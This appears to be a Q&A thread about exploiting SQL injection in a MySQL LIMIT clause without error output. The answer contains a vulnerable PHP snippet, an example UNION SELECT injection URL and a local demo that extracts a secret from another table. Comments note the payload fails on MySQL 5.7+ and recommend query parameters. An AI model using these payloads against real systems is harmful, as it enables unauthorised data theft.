# LIMIT clause SQL injection without error output

Tags: mysql, sql, sql-injection

Let's assume we have got this query:

```
SELECT title FROM articles LIMIT 15
```

We are able to pass any string to the LIMIT clause, but the site does not output errors, in other words, when error occurs the site shows a blank page.

My question is, can attacker still proceed any kind of SQL injection? Maybe some time based injection with procedure_analyse?

Thanks in advance.

Comment: http://www.edwardl.xyz/2015/02/06/SQL%20Injections%20in%20MySQL%20LIMIT%20clause/

Comment: I've tried the benchmark method, but it loaded immediately, so probably error was thrown immediately.

Comment: Are you unable to modify the source to sanitize the limit clause? what stack are you using? if php/mysql it might be worth reading https://stackoverflow.com/questions/10014147/limit-keyword-on-mysql-with-prepared-statement

Comment: @WilliamBurnham he is not protecting his own site, he is breaking someone's else one. Or may be he's a wannabe pen-tester, but again, protection is not his concern. Otherwise he would have asked straight how to protect a LIMIT clause. From the protection point of view such a question  (there is a security hole, I don't care to fix it, I only want to know how to exploit) makes no sense.

Comment: No, actually a pentester has reported this bug he found on our site and wanted to get reward, which we offer to bug hunters. But he was not able to get data from databse, so i started testing by myself if i can get through. I just wanted to know if it’s exploitable, because in case it’s not, we wouldn’t pay him a penny, since nobody would be able to get anything from database.

Comment: Injection is injection. If you have not enough knowledge in SQL to exploit it, it doesn't mean someone else wouldn't have more knowledge and devise an exploit.

Answer (score 0):

If there is an SQL injection vulnerability like this:

```
$UnsafeVariable = $_GET['param'];
$sql = "SELECT title FROM articles LIMIT $UnsafeVariable";
```

Then an example of SQL injection could be like::

```
http://mysite.example.com/page.php?param=0 UNION SELECT anything FROM anytable
```

It's common to use UNION to perpetrate SQL injection. I'm not revealing anything here you can't read on a site like https://owasp.org. You should try to do some reading.

---

Demo:

```
mysql> create table MyTable (id int primary key );

mysql> create table SecureTable (secret varchar(50));

mysql> insert into MyTable values (1), (2), (3);

mysql> insert into SecureTable values ('Alohomora');

mysql> select id from MyTable limit 
       /* now the part that is SQL injected */
       1 union select secret from SecureTable;
+-----------+
| id        |
+-----------+
| 1         |
| Alohomora |
+-----------+
```

Comment: You should try to do some research first, you cannot use union in/after LIMITY clause, look at SQL query structure.

Comment: @TadeášJílek, see demo above, tested on MySQL 5.6.31.

Comment: This won't work in MySQL 5.7+ because now you cannot use `UNION` after `LIMIT` unless the whole query before `UNION` is surrounded in parenthesis. Something like `(SELECT * FROM table LIMIT 1) UNION SELECT ....`.

Comment: Thanks for that correction. Regardless, I think the usual advice is still best: **use query parameters**, then you don't have to wonder if it's safe from SQL injection in the current version of MySQL.